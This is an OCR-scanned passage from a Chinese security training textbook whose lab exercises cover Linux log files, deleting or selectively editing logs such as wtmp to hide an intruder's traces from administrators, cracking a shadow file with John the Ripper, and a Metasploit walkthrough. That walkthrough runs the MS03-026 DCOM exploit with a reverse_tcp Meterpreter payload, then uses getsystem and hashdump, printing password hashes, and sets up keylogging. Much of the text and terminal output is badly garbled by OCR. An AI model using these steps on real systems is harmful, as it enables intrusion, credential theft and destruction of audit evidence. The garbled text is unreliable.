(2) 进程 统计 日 志 。 进 程 统 计 日 志 由 Linux 内 核 记 录 , 当 一 个 进程 终止 时 ,进程 终止 文 
件 (pacct 或 acct) 中 会 对 这 一 事件 进行 记录 。 进 程 统计 日 志 可 以 供 系统 管理 员 分 析 系 统 使 
用 者 对 系统 进行 的 配置 ,以 及 对 文件 进行 的 操作 。 

G) 错误 日 志 。Syslog 日 志 系 统 已 经 被 许多 设备 兼容 ,Linux 的 Syslog 可 以 记录 系统 
事件 ,主要 由 syslogd 程序 执行 ,Linux 系统 下 各 种 进程 .用户 程序 和 内 核 都 可 以 通过 Syslog 
文件 记录 重要 信息 ,错误 日 志 记 录 在 /var/log/messages 中 。 

2. Linux 系统 日 志 的 工作 特点 

在 Linux 系统 中 ,有 关 当 前 登录 用 户 的 信息 记录 在 文件 utmp 中 ; 登录 进入 和 退出 等 信 
息 记 录 在 文件 wtmp 中 ; 最 后 一 次 登录 文件 可 以 用 “lastlog” 命 令 查看 ; 数据 交换 、 关 机 和 重 
启 也 记录 在 wtmp 文件 中 。 所 有 的 记录 都 包含 时 间 鹤 ,这 些 文件 (lastlog 通常 不 大 ) 在 具有 
大 量 用 户 的 系统 中 增长 十 分 迅速 。 例 如 ,wtmp 文件 可 以 无 限 增长 ,除非 定期 截取 ,因此 许 
多 系统 以 一 天 或 一 周 为 单位 把 wtmp 配置 成 循环 使 用 。 它 通常 由 cron 运行 的 脚本 来 修改 ， 
且 这 些 脚本 重新 命名 并 循环 使 用 wtmp 文件 。 通 常 ,wtmp 在 第 一 天 结束 后 命名 为 wtmp. 1; 
第 二 天 结束 后 wtmp. 1 变 为 wtmp. 2; 如 此 循环 ,直到 变 为 wtmp. 7。 


3.4.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 主要 掌握 以 下 内 容 。 

(1) Linux 日 志 的 作用 。 

(2) Linux 日 志 的 存放 位 置 及 工作 特点 。 

(3) Linux 日 志 的 删除 方法 。 

2. 实验 条 件 

本 实验 中 所 使 用 的 Linux 操作 系统 为 Red Hat, 既 可 以 运行 在 物理 机 上 ,也 可 以 运行 在 
虚拟 环境 中 。 


3.4.3 实验 过 程 
1. 查看 Linux 系统 日 志 
主要 操作 步骤 如 下 。 


步骤 1: 以 root 身份 登录 系统 后 ,执行 “cat/var/log/messages” 等 命令 查看 以 下 各 个 日 
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志 内 容 , 如 图 3-27 所 示 。 其 中 ,/var/log/messages 是 核心 系统 日 志文 件 , 它 包含 了 系统 启 
动 时 的 引导 消息 ,以 及 系统 运行 时 的 其 他 状态 消息 。1/O 错误 、 网 络 错误 和 其 他 系统 错误 都 
会 记录 到 这 个 文件 中 ,而 其 他 信息 ,如 某 个 用 户 的 身份 切换 为 root, 也 在 这 里 列 出 。 如 果 服 
务 正在 运行 (例如 运行 中 的 DHCP 服务 器 ), 也 可 以 在 messages 文件 中 观察 到 它 的 活动 。 
通常 ,/var/log/messages 是 系统 管理 员 在 进行 故障 诊断 时 首先 要 查看 的 文件 。 
此 外 ,还 包括 以 下 日 志 。 
/var/log/secure: 与 安全 相关 的 日 志 信 息 。 
/var/log/maillog: 与 邮件 相关 的 日 志 信息 。 
/var/log/cron: 与 定时 任务 相关 的 日 志 信息 。 
/var/log/spooler: 与 新 设备 相关 的 日 志 信息 。 
/var/log/boot. Іов: 守护 进程 启动 和 停止 相关 的 日 志 消 息 。 


file Edit View Search Terminal Help 





图 3-27 查看 各 类 日 志 内 容 


步骤 2: 以 root 身份 登录 后 ,执行 “who/var/log/wtmp” 或 “last” 命 令 , 查 看 wtmp 文件 
的 内 容 , 如 图 3-28 所 示 。 该 日 志文 件 永久 记录 每 个 用 户 登 录 ,注销 及 系统 的 启动 .停机 的 事 
件 。 因 此 随 着 系统 正常 运行 时 间 的 增加 ,该 文件 也 会 越 来 越 大 ,其 增加 的 速度 取决 于 系统 用 
户 登录 的 次 数 。 该 日 志文 件 可 以 用 来 查看 用 户 的 登录 记录 ,通过 “last” 命 令 可 以 访问 这 个 
文件 获得 这 些 信息 , 既 可 以 反 序 从 后 向 前 显示 用 户 的 登录 记录 ,也 能 根据 用 户 、 终 端 tty 或 
时 间 显示 相应 的 记录 。 

命令 "last? 有 以 下 两 个 可 选 参数 。 

last-u 用 户 名 : 显示 用 户 上 次 登录 的 情况 。 

last-t ЖЖ: 显示 指定 天 数 之 前 的 用 户 登 录 情 况 。 


E rootóisch:/usr/local/virmac 


Pile Edit View Search Ferminal Help 








3-28 ”查询 wtmp 文件 的 内 容 
步骤 3: f Hi" history" fie ,查看 最 近 所 执行 过 的 命令 ,如 图 3-29 所 示 。 


| Eile Edit View Search Terminal Help 


图 3-29 查看 最 近 所 执行 过 的 命令 
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2. 手动 删除 Linux 日 志 

常用 的 日 志文 件 如 下 。 

access-log: 记录 http/web 的 传输 。 

acct/pacct: 记录 用 户 命令 。 

aculog: 记录 Modem 的 活动 。 

btmp: 记录 失败 的 记录 。 

lastlog: 记录 最 近 几 次 成 功 登录 的 事件 和 最 后 一 次 不 成 功 的 登录 。 

messages: 从 syslog 中 记录 信息 (有 的 链接 到 syslog 文件 ) 。 

syslog: 从 syslog 中 记录 信息 (通常 链接 到 messages 文件 ) 。 

utmp: 记录 当前 登录 的 每 个 用 户 。 

wtmp: 一 个 用 户 每 次 登录 进入 和 退出 时 间 的 永久 记录 。 

xferlog: 记录 FTP 会 话 。 

- 般 情况 下 ,需要 清除 的 日 志 主 要 有 lastlog、utmp(utmpx)、wtmp(wtmpx)、messages、 

syslog 等 。 

步骤 1: 输入 “ls/var/log” 命 令 , 查 看 /var/log 目录 下 的 日 志文 件 , 如 图 3-30 所 示 。 





rootgisch:jusr/local/virmachine 


gdm 
httpd 


spice-vdagentd 
libvirt 


ntpstats 


ррр 
prelink 
rhsm 

sa 





图 3-30 £r log 文件 夹 下 的 日 志文 件 


步骤 2: 使 用 root 身份 登录 系统 ,执行 “rm -f /var/log/wtmp” 命 令 , 如 图 3-31 所 示 ,再 
用 “ls /var/log" MS 2 fi /var/log 目录 下 的 日 志文 件 , 发 现 wtmp 被 删除 ,如 图 3-32 所 示 。 


root@isch:/usr/local/vir 





3-31 执行 “rm -f /var/log/wtmp” 命 令 


当 以 root 用 户 身 份 登录 系统 后 , 既 可 以 使 用 "rm -f /var/log/wtmp” 命 令 来 将 对 应 的 日 
志 删 除 , 也 可 以 使 用 */var/log/wtmp” 命 令 将 内 容 清空 ,以 上 两 种 方式 虽然 能 够 彻底 地 消除 
攻击 者 留 下 的 痕迹 ,但 是 会 被 系统 管理 员 发 现 。 因 此 ,可 以 选择 使 用 编辑 器 对 日 志文 件 进行 
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图 3-32 确认 wtmp 文件 已 经 被 删除 


选择 性 的 修改 ,具体 命令 为 “vi/var/log/wtmp”。 其 中 ,有 关 Linux 下 的 vi 编辑 器 的 使 用 方 
法 ,读者 可 通过 查阅 相应 的 文献 ,并 通过 上 机 操作 来 掌握 。 
使 用 相同 的 方法 ,可 以 对 其 他 日 志文 件 进行 修改 、 删 除 操作 。 


3.4.4 任务 与 思 


由 于 Linux 系统 是 基于 文件 记录 的 系统 日 志 , 尽 管 重要 的 日 志文 件 已 经 是 二 进 制 的 ,但 
是 由 于 Linux 是 开源 的 操作 系统 ,因此 有 些 情况 下 攻击 者 在 入 侵 后 经 常会 通过 消除 日 志 信 
息 来 “打扫 战场 ”。 虽 然 在 这 种 情况 下 日 志 信息 显得 不 是 那么 可 靠 ,但 是 如 果 能 够 综合 运用 
Linux 系统 提供 的 大 量 命令 ,通过 系统 的 .关联 的 分 析 还 是 能 够 找到 攻击 者 的 蛛丝马迹 。 

Linux 提供 了 功能 强大 和 类 型 丰富 的 日 志 功 能 ,希望 读者 能 够 通过 全 面 学 习 和 不 断 实 
践 ,掌握 Linux 系统 日 志 的 组 成 ,存放 位 置 及 安全 管理 方法 。 





3.5 使 用 John the Ripper 破解 Linux 系统 密码 


3.5.1 预备 知识 : John the Ripper 介绍 


John the Ripper 是 一 款 在 已 知 密 文 的 情况 下 尝试 破解 出 明文 的 密码 破解 工具 ,支持 
DESs.MD4. MD5 等 目前 大 多 数 的 加 密 算 法 。John the Ripper 虽然 支持 UNIX, Linux, 
Windows, DOS 模式 .BeOS .OpenVMS 等 多 种 类 型 的 系统 架构 ,但 主要 用 于 破解 不 够 牢固 
的 UNIX/Linux 系统 密码 。John the Ripper 的 官方 网 站 为 http://www. openwall. com/ 
john/ ,下 面 介绍 它 提供 的 4 种 破解 模式 。 

1. 简单 破解 模式 

简单 破解 模式 (single crack mode) 为 专门 针对 “使 用 账号 作为 密码 ”的 用 户 , 如 某 一 个 
WI PU S "admin" 对 应 的 密码 为 “admin888”admin123” 等 。 使 用 这 种 破解 模式 时 ， 
John the Ripper 会 根据 密码 内 的 账号 进行 密码 破解 ,并 且 使 用 多 种 字 词 变化 的 规则 套用 到 

















第 3 章 Linux 操作 系统 攻防 实 训 105 





账号 内 ,以 增加 破解 的 成 功率 。 

2. 字典 破解 模式 

字典 破解 模式 (wordlist crack mode) 需 要 用 户 指定 一 个 字典 文件 ,John the Ripper i 
取 用 户 给 定 的 字典 文件 中 的 单词 进行 破解 。John the Ripper 中 自 带 了 一 个 字典 ,字典 文件 
名 为 password. lst, 文 件 中 包含 了 一 些 常用 来 作为 密码 的 单词 。 

这 种 方式 比较 简单 ,只 需 告 诉 John the Ripper 密码 文件 的 位 置 即 可 ,在 这 种 模式 下 
John the Ripper 会 自动 使 用 字 词 变化 功能 进行 破解 。 

3. 增强 破解 模式 

增强 破解 模式 (incremental mode) 是 John the Ripper 中 功能 最 为 强大 的 破解 模式 , 它 
会 自动 尝试 所 有 可 能 的 字符 组 合 ,然后 当 作 密 码 来 破解 。 该 模式 属于 暴力 破解 方法 ,所 以 破 
解 过 程 中 所 用 的 时 间 较 长 。 

4. 外 挂 破解 模式 

外 挂 破解 模式 (external mode) 是 让 使 用 者 用 C 语言 编写 “破解 模块 程序 ”, 然 后 将 编写 
后 的 “破解 模块 程序 ? 挂 接 在 John the Ripper 环境 下 ,进行 密码 的 破解 操作 。“ 破 解 模块 程 
FE” EH C 语言 编写 的 函数 ,该 函数 的 功能 是 根据 破解 需要 产生 字典 文件 ,John the Ripper 
通过 读 取 字典 文件 中 的 单词 来 破解 密码 。 


3.5.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 主要 掌握 以 下 内 容 。 

(1) Linux 操作 系统 中 用 户 密 码 的 保存 特点 。 

(2) 常见 密码 的 破解 方法 。 

(3) John the Ripper 工具 的 使 用 方法 。 

2. 实验 条 件 

本 实验 可 在 一 台 运 行 Windows Server 2003 及 以 上 版 本 的 Windows 服务 器 操作 系统 
上 运行 ,同时 ,在 正式 实验 之 前 ,需要 安装 John the Ripper 工具 软件 。 


3.5.3 实验 过 程 


步骤 1: 以 系统 管理 员 身 份 正 常 登录 Windows 服务 器 操作 系统 ,然后 进入 John the 
Ripper 工具 软件 的 安装 文件 夹 ( 本 实验 为 D:\tools\john179) ,主要 有 doc 和 run 两 个 文件 。 
其 中 , 主 程序 为 run 文件 夹 下 的 john. exe.john. ini 为 它 的 配置 文件 。 

步骤 2: John the Ripper 工具 为 命令 行 下 使 用 的 一 个 软件 ,有 关 操 作 都 需要 在 命令 提示 
符 下 进行 。 选 择 “ 开 始 ” 一 “运行 ”选项 ,在 出 现 的 对 话 框 中 输入 “cmd” 命 令 , 按 Enter 键 后 打 
开 “ 命 令 提 示 符 ”窗口 ,输入 “cd tools\john179\run” 命 令 进入 run 文件 夹 , 如 图 3-33 所 示 。 

步骤 3: 输入 “john. ex” me ,会 出 现 有 关 John the Ripper 工具 的 使 用 参数 说 明 ,如 图 3-34 
所 示 。 

John the Ripper 工具 的 命令 使 用 格式 为 : 
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C:\Documents and Settings\hdministrator?d: 


d toolsNjohni?9wrun 


:\tools Njohni ?9 eun? 





图 3-33 ”切换 到 John the Ripper 所 在 的 文件 夹 


\TINDOYS\systen32\en' 
tools\john1?9 run? john .exe 
[John the Ripper password cracker, version 1.7.9 
opyright <c) 1996-2011 by Solar Designer 
Homepage: http://www.openvall.com/john/ 





"single crack" mode 
wordlist mode, read words from FILE or stdin 
enable word mangling rules for wordlist mode 
“incremental” mode [using section MODE] 
external mode or word filter 
output candidate words [cut at LENGTH] 
ore an interrupted оп [called NAME] 


print stat ion [called NAME] 
ake-charset-FILE make a charset, vill be overuritten 
hov show cracked p: 
t[=TIME] run tests and benchmari seconds each 
"L-JLOGINIUIDI,..] [do not] load this (th only 
upKs》only 
only 
with[out] at least COUNT s only 
enable memory saving, at LEUEL 1..3 
ornat =МАМЕ force hash type МАМЕ: des/bsdi/ndS/bf/afs/1n/trip/ 
dunny 








图 3-34 John the Ripper 工具 的 参数 说 阴 


john [选项 ] [密码 文件 ] 





f" john. exe” 命 令 后 ,在 图 3-34 中 对 每 一 个 参数 的 功能 及 使 用 方法 进行 了 详细 说 
明 ,读者 可 根据 需要 选择 使 用 相关 的 参数 

步骤 4: 破解 Linux 密码 。John the Ripper 是 对 
码 ,首先 要 取得 它 的 密码 文件 ,假设 在 实验 中 已 取得 了 一 个 Linux 的 密码 文件 
shadow.shadow 文件 在 实验 之 前 已 经 复制 到 ка e 文件 夹 中 。 现 在 需要 
对 shadow 文件 进行 破解 操作 ,最 简单 的 破解 命令 为 “john. exe shadow”, 运 行 过 程 和 结果 如 
图 3-35 所 示 。 

可 以 看 到 ,破解 出 root 用 户 的 密码 为 abc123。 密 码 破 解 的 字典 文件 password. Ist 可 以 
用 记事 本 打开 ,然后 根据 破解 需要 自己 添加 字典 内 容 ,John the Ripper 进行 密码 破解 时 会 
读 取 文件 中 的 内 容 逐 个 测试 


3.5.4 任务 与 思考 


本 实验 的 操作 过 程 相对 简单 ,但 涉及 的 知识 面 较 广 ,主要 包括 常见 的 加 密 算法 和 加 密 机 
1]. Linux 系统 中 用 户 密码 的 存储 和 管理 方式 、 密 码 破解 方法 等 。 请 读者 在 本 实验 的 基础 
上 ,对 以 上 内 容 进行 深入 系统 的 学 习 。 





文件 进行 破解 的 工具 ,要 破解 








Linux 名 





2l 
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паке а charset, FILE will be overwritten 

shov cracked 

run te: for TIME seconds each 
[do notl load this 

load users [not] of this 《th 





withlout] at 1 COUNT passwords only 
[--save-nemory-LEUEL enable menory saving, at LEUEL 1..3 
format =МАМЕ force hash type МАМЕ: des/bsdi/nd5/bf/afs/lm/trip/ 


dunny 


hn179 \run> 
hn179 \run> 
Njohn179 \run> 
Niohn179 \run> 
:NtoolsNjohni79wrun?john.exe shadow 
with 3Mlifferent salts (FreeBSD MDS [32/32] 
‹ 
<hehe> 
croot) 
3 tine: 0:00:00:00 1002 (2) c/s: 8526 trying: abc123 
show" option to display all of the cracked р: rds reliably 





3-35 ”运行 "john. exe shadow” 命 令 ,破解 shadow 文件 


同时 ,John the Ripper 是 一 款 功能 强大 的 密码 破解 工具 ,提供 了 大 量 的 参数 ,不 后 
体现 了 不 同 的 应 用 功能 ,也 为 不 同情 况 下 的 密码 破解 提供 了 帮助 和 支持 。 读 者 可 在 本 
操作 的 基础 上 ,参阅 John the Ripper 软件 的 帮助 文档 或 其 他 技术 资料 ,并 通过 具体 操作 ,全 
面 掌握 John the Ripper 软件 的 使 用 方法 












3.6 Meterpreter 键盘 记录 


3.6.1 预备 知识 : Metasploit 框架 介绍 


BackTrack 预 装 了 最 常用 的 高 级 漏洞 利用 工具 集 , Metasploit 框架 (http//www. 
metasploit. com) 便 是 其 中 之 一 。Metasploit 是 一 个 免费 的 、 可 下 载 的 框架 ,通过 该 框架 可 以 
获取 、 开 发 针对 计算 机 软件 漏洞 实施 的 攻击 ,Metasploit 本 身 附带 数 百 个 已 知 软件 漏洞 的 专 
业 级 漏洞 攻击 工具 。Metasploit 框架 使 用 Ruby 程序 语言 编写 ,具有 较 好 的 扩展 性 。 

Metasploit 框架 由 库 .接口 和 模块 三 部 分 组 成 ,其 中 ,本 实验 关注 的 重点 是 各 个 接口 和 
模块 的 功能 。Interfaces( 控 制 台 、CLI、Web、GUI 等 ) 为 处 理 模块 (漏洞 利用 ,有效 载荷 、 辅 助 

CE 加密 引 擎 .Nops 等 ) 提 供 操作 接口 。 每 个 模块 都 有 自己 的 价值 ,在 渗透 测试 中 起 到 不 
同 的 作用 ,具体 如 下 。 

CD 漏洞 利用 。 漏 洞 利用 是 一 串 验 证 性 代码 ,主要 针对 目标 系统 的 特定 漏洞 开发 。 

(2) 有 效 载 荷 。 有 效 载荷 是 一 段 恶 意 代 码 , 也 可 能 是 漏洞 验证 程序 的 一 部 分 ,还 可 能 是 
独立 编译 后 用 于 在 目标 系统 上 运行 的 任意 命令 

G) 辅助 工具 。 辅 助 工具 是 一 个 工具 集 , 用 于 扫描 、 嗅 探 `. 区 域 拨号 .获取 指纹 及 其 他 安 
全 评估 任务 。 

(4) 加 密 引 擎 。 开 发 用 来 加 密 渗 透 测 试 中 的 有 效 载荷 ,以 对 抗 杀毒 软件 .防火墙 .IDS/ 
IPS 及 其 他 类 似 的 反 恶 意 软 件 的 查 杀 。 





j 
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(5) NOP( 空 操作 )。NOP 是 一 个 汇编 指令 ,通常 插入 shellcode 中 ,不 起 任何 作用 ,只 
是 用 来 为 有 效 载荷 占 位 。 

Meterpreter 是 Metasploit 框架 中 的 一 个 功能 模块 ,通常 作为 漏洞 溢出 后 的 攻击 载荷 来 
使 用 ,攻击 载荷 在 触发 漏洞 后 能 够 返回 给 攻击 者 一 个 控制 通道 。Meterpreter 是 一 种 先进 
的 .隐蔽 的 、 多 功能 的 可 动态 扩展 的 载荷 ,通过 dll 注入 的 方式 进入 目标 内 存 , 支 持 脚 本 和 
插件 在 运行 时 进行 动态 装载 ,以 保持 可 扩展 性 。Meterpreter 的 主要 功能 包括 提 权 、 保 存 系 
统 账 号 、 记 录 关 键 信息 、 保 持 后 门 服务 、 开 启 远程 桌面 等 ,同时 Meterpreter shell 的 整个 通信 
过 程 都 是 默认 加 密 的 。 


3.6.2 实验 目的 和 条 件 


1. 实验 目的 

Metasploit 框架 是 一 个 功能 非常 强大 的 开源 平台 ,提供 了 开发 ,测试 和 使 用 恶意 代码 所 
需要 的 环境 ,为 渗透 测试 ,shellcode 编写 和 漏洞 研究 提供 了 一 个 可 靠 平台 。Metasploit 框架 
是 一 个 庞大 的 系统 ,在 一 个 实验 中 无 法 完全 反映 其 功能 。 本 实验 主要 介绍 了 Metasploit 框 
架 中 Meterpreter 模块 的 部 分 应 用 ,主要 目的 是 让 读者 对 Metasploit 框架 有 个 初步 的 认识 。 

2. 实验 条 件 

本 实验 所 需要 的 软 硬 件 清单 如 表 3-1 所 示 。 

Ж 3-1 Meterpreter 键盘 记录 实验 清单 



































类 = m s 软 硬 件 要 求 я № 
1 数量 1f 
攻击 机 2 操作 系统 版 本 BackTrack 5 
3 软件 版 本 RainbowCrack 
1 数量 16 
XUL 2 操作 系统 版 本 Windows Server 
3 软件 版 本 2003 及 以 上 版 本 


3.6.3 实验 过 程 


步骤 1: 打开 攻击 机 bt5(BackTrack 5) ,如 果 进 入 命令 行 模式 ,可 以 输入 “startx” 命 令 切 
换 到 如 图 3-36 所 示 的 图 形 界面 ,以 便于 操作 。 

步骤 2: 选择 BackTrack — Exploitation Tools == Network Exploitation Tools —> Metasploit 
Framework Msfconsole 选项 来 启动 MSF Console, MSF (Metasploit Framework) Console 是 
一 个 高 效 的 多 功能 接口 ,可 方便 渗透 测试 者 更 好 地 利用 漏洞 程序 框架 。 

步骤 3: fili A "search ms03 026” 命 令 ,查询 “MS03-026 漏洞 ”的 相关 信息 ,如 图 3-37 所 
示 。 在 查询 到 “MS03-026 漏洞 ”后 ,还 可 以 输入 “info exploit/windows/dcerpc/ms03_026_ 
dcom" p . T fif MS03_026_dcom 利用 程序 的 相关 内 容 。 

步骤 4: 在 掌握 MS03 026 dcom 相关 信息 的 基础 上 ,输入 “use exploit/windows/ 
dcerpc/ms03_026_dcom” 命 令 ,查看 “利用 漏洞 ?程序 需要 设置 的 相关 内 容 , 如 图 3-38 所 示 。 
通过 命令 提示 符 的 改变 ,说 明 该 命令 已 经 成 功 运行 。 





第 3 章 Linux 操作 系统 攻防 实 训 109 





Applications Places System d Ба Sun jan 20, 12:28 PM 


7A 


Install BackTrack 


<< back 





3-36 BackTrack 5 图 形 界面 


^ v х root@bt: ~ 
File Edit View Terminal Help 
000 
o0 
o 


| 
| 
| 
| 
| PAYLOAD 
| 
| 
| 


Ul a v D - 6 ый „а, тй. Жы: 








图 3-37 查询 “MS03-026 漏洞 ” 
步骤 5: 继续 对 攻击 环境 进行 配置 。 其 中 : 
输入 “set RHOST 192. 168. 1. 249” 命 令 ,设置 攻击 主机 ( 靶 机 ) 的 IP 地 址 。 
输入 “set LHOST 192. 168. 1. 248” 命 令 ,设置 本 机 (攻击 机 ) 的 IP 地 址 。 
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^ v x root@bt: ~ 
File Edit View Terminal Help 


api:1.0] 
151 post 
nops 


Dat 1 cription 


00:00:00 UTC 





图 3-38 查看 “利用 漏洞 ”程序 需要 设置 的 相关 内 容 


et LPORT 135” 命 令 , 设 置 监 听 端 口 。 

输入 “set payload windows/meterpreter/reverse_tcp” 命 令 ,执行 “利用 漏洞 "程序 。 

输入 “exploit” 命 令 , 会 探测 到 对 方 的 系统 类 型 和 语言 版 本 ,并 且 显 示 已 经 打开 的 
meterpreter 会 话 ° 
WE Ang 3-39 所 示 。 











^ v X rootGbt: ~ 
File Edit View Terminal Help 


> use exploit/windows, 
exploit 92 


192.168.1.2 
LHi 192.168.1.2 
LPORT 
exploit( 
yload => window: 


exploit(ms03 


Started on 192.168.1.2 


Binding to 4d9f4ab8 6 7:0.0dhca ср:192.168.1.2481135] 
Bound to 4096 kT @ AR 
Sending е о1ї 


168.1.248:135 -> 1$2.168.1.249:1558) at 2013-1 








图 3-39 配置 攻击 环境 
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步骤 6: TE" meterpreter >” 后 输入 “help” 命 令 , 可 以 获得 关 
方法 说 明 , 如 图 3-40 所 示 。 
[B x Terminal 
File Edit View Тептїпа! Help 





F Meterpreter 的 详细 使 用 





Imeterpreter > help 


Core Commands 


Command Description 
Help menu 

background Backgrounds the current sessiom 

bgkill Kills a background meterpreter sChipi 

bglist Lists running background scripts 

bgrun a Execukes a meterpreter script as ea“backygpound threl 


n Bpse§ а chərnel 

disable unicode encoding Disab|es encoding of unicode st 页 ngs 
enable unicode encoding Enables encoding of unicode strings 
exit Terminate the meterpreter session 

help Help menu 

info Displays information about a Post module 
interact Interacts with a channel 

irb Drop into irb scripting mode 

load Load one or more meterpreter extensions 


«ашё @ e тайы ості Channels 








图 3-40 获得 关于 Meterpreter 的 详细 使 用 方法 说 明 


步骤 7: 执行 完 exploit 后 ,就 已 经 获得 了 一 个 Meterpreter shell。 接 下 来 获取 系统 权 
R, 先 输入 “getuid” 命 令 ,获取 系统 的 运行 账户 ,如 图 3-41 所 示 。 
[^ ~ x Terminal | 
File Edit View Terminal Help 





— Manipulate file MACE attributes 


meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM 


lmeterpreter > use priv 
[-] The 'priv' extension has already been loaded 


meterpreter > getsystem -h 
Usage: getsystem [options] 
Attempt to elevate your privilege to that of local system. 


OPTIONS: 


eh Fe Gae | 
*t «ipt» ңе trechñidue, ouse. [се Tb "hs 


: All techniques fvailable 
: Service - Named Pipe Impersonation (In Memory/Admin) 
: Service - Named Pipe Impersonation (Dropper/Admin) 
Service - Token Duplication (In Memory/Admin) 
: Exploit - КіТгарер (In Memory/User) 


|meterpreter > 





图 3-41 获取 系统 的 运行 账户 


+ 


EIR 8: 输入 “getsystem” 命 令 , 获 取 系统 权限 ,如 图 3-42 所 示 。 另 外 ,也 可 以 输入 
“getsystem -h” 命 令 来 获得 针对 getsystem 命令 的 详细 使 用 方法 。 

步骤 9; 输入 "sysinfo” 命 令 ,查看 目标 主机 的 信息 ,如 图 3-43 所 示 。 可 以 看 到 被 攻 才 
机 的 名 称 、 系 统 类 型 .架构 类 型 、 系 统 语言 等 信息 。 








Е 
н 
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f- ~ ~= Terminal 
File Edit View Terminal Help 


Server username: NT AUTHORITY\SYSTEM 
meterpreter > use priv 
[-] The 'priv' extension has already been loaded: 


meterpreter > getsystem -h 
Usage: getsystem [options] 


Attempt to elevate your privilege to that of locať system. 


Help Banner. 
-t <opt> The technique to use. (Default to '0'). 
а © : All techgiques available 
Service B NəmediPinglImpersonation 1:2 MemóryyAdmiñ) 
: “sehvice t. ДТ Y "ДА ЛИШ 
: Service, 8 ся Sy А пме ry/Admi n) 
: Exploit - КіТгафер (In Memory/User) 


|meterpreter > getsystem 

,got system (via technique 1). 
meterpreter > clear 

[-] Unknown command: clear. 
meterpreter > 





3-42 获取 系统 权限 


^ v X root@bt: ~ 

File Edit View Terminal Help 

imsf exploit(ms803 026 dcom) > set LPORT 135 

LPORT => 135 

msf exploit(ms03_026_dcom) > set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 

msf exploit(ms03_026_dcom) > exploit 


Started reverse handter on 192.168.1.248:135 

Trying target Windows NT SP3-6a/2000/XP/2003 Universal... 

Binding to 4d9f4ab8-7dlc-11cf-861e-0020af6e7c5 „Өёпсасп ip tcp:192.168.1.249[135j. 

Bound to 4d9f4ab8-7dlc-11cf-861e-8028af6e7c57:8.0Gncacn ip tcp:192.168.1.249[135] 

Sending exploit ... 

Sending stage (752128 bytes) to 192.168.1.249 

Meterpreter session 1 opened (192.168.1.248:135 -> 192.168.1.249:1550) at 2013-12-24 05:27:53 +080 


|meterpreter > getsystem 
..901 system (via technique 1). 


meterpreter > getvid 
[-] Unknown command: getvid. 


meterpreter > getuid 


H odinuon A ) 
Windóks .NETSSETvBhzfBuiRts3799 月 
: x86 
: zh CN 
: х86/міпз2 





图 3-43 查看 目标 主机 的 信息 


步骤 10: 接 下 来 ,可 以 通过 “run hashdump” 命 令 ,获取 系统 用 户 的 Hash 值 , 如 图 3-44 
所 示 。 

在 获得 了 еа Hash 值 后 .可 以 io ra Ophcrack) 进 行 破解 ,具体 方 
法 在 此 不 再 袭 述 。 请 读者 在 查阅 相关 文献 资料 的 基础 上 ,通过 上 机 操作 ,学 习 有 关 
Ophcrack беч Г.) ЛУ HPF ex RR fl HJ еч 
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View Terminal Help 

Windows 2000 (Build 2195, Service Pack 4). 

x86 
System Language : zh_CN 
Meterpreter x86/win32 
neterpreter > 
[*] Obtaining the boot key 
[*] Calculating the hboot key using SYSKEY ba7edf7d2cc19b9e0d6$8ËDCT5Waelaa 
[*] Obtaining the user list and keys... 
[*] Decrypting user keys... 
[*] Dumping password hashes... 


Administrator :500:aad3b435b51404eeaad3b435b51404ee : 3106сғеб1164е931073 65907 eB cee 
ERE рц к р E "ms 
сиве: 5giaad3b439p524848aadafa 350514046 106 о4е61673С5517=0с̧әвәсе 

Use Bodo bc hacc abd f8$ fbadas 4698281 f9;53B828ed89eb7bbc2add7806d444 


ТЫЅА ADMINIST-840DES5:1001:a56e254e4e3434b14e675c572d49fbd54:06e240€337cc612898c7ac| 
916faaab302: : : 

IWAM ADMINIST-840DE5:18002:6b9172bf81b9a65118cbad826033e1d5:3175524b07cee57c6dab5 
6fc3e56b400: 





meterpreter > | 


图 3-44 获取 系统 用 户 的 Hash 值 





步骤 11: Meterpreter 还 能 够 获得 并 记录 目标 主机 上 的 键盘 输入 信息 , 即 能 够 远程 记录 
对 方 在 自己 的 计算 机 上 输入 的 信息 。 首 先 , 输 入 "ps” 命 令 , 查 看 目标 主机 上 和 运行 的 进程 ,如 
É 15 所 示 ,可 以 查看 到 explorer. exe 程序 的 ID 是 1512. 








a v xirootebt ~ 
File Edit View Terminal Help 


svchost.exe NT AUTHORITYVSYSTEM \WINDOWS\ System32\ sv 


notepad.exe DCN-OTUOXLAM3PSVAdministrator C:\WINDOWS\system32\NO 
ТЕРАС EXE 
832 452 svchost.exe NT AUTHORITY\NETWORK SERVICE WINDOWS system32\sv 
|chost.exe 
848 452 svchost.exe NT AUTHORITY\SYSTEM : \WiNDOWS\ System32\sv 


spoolsv.exe МТ AUTHORITY\SYSTEM NWINDOWSNS ystem32 sp. 
msdtc.exe NT AUTHORITY ANETWORK SERVICE WINDOWS ys Stems, 
svchost.exe NT AUTHORITYALOCAL SERVICE WINDOMS systen32Nsv 


1280 408  logon.scr DCN-OTUOXLAM3PSMAdministrator C: VWINDOMS System32Alo 
gon. scr 
1316 dfssvc.exe NT AUTHORITY\SYSTEM WINDOWS syS TENS ND 


1512 1496 explorer.exe DCN-OTUOXLAM3PSVAdministrator С. WINDOWS VEXDTOTET: ЮС 


1588 1512 ctígón.exe w ` Í pfN-oTubxLANIPS ДИТ rfe tpa uo" di уЙЇ ОИС systema) ct 
1624 59 0©м-от! AMSPS^ Aimi ъз Ра Соте Сї VWINDOWS sys teg32Vtm. 
1d ,exe 

1640 1624 conime.exe DCN-OTUOXLAM3PSVAdministrator C:XWINDOWSASystem3? со 
nime ехе 

1856 632  wmiprvse.exe NT AUTHORITYASYSTEM C: \WINDOWS\ system32\wb 
lem\wmiprvse,exe 


meterpreter 





图 3-45 查看 目标 主机 上 运行 的 进程 


步骤 12: 输入 “migrate 1512” 命 令 启动 该 程序 ,如 图 3-46 所 示 。 
步骤 13: Hj 行 “getuid” 命 令 , 会 看 到 已 经 具有 Administrator 权限 了 ,如 图 
所 示 。 
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File Edit View Terminal Help 
696 1512 notepad.exe 

[TEPAD. EXE 
832 452 
chost.exe 


svchost.exe 
svchost.exe 
spoolsv.exe 
msdtc.exe 


1184 452 
|chost ,exe 
1280 408 
gon. scr 
1316 452 
ssvc.exe 
1512 1496 explorer.exe 
3 

1588 1512 ctfmon.exe 
"поп. ехе 

1624 1512 cmd.exe 
59 

1640 1624 dijne бс 
nime ехе 

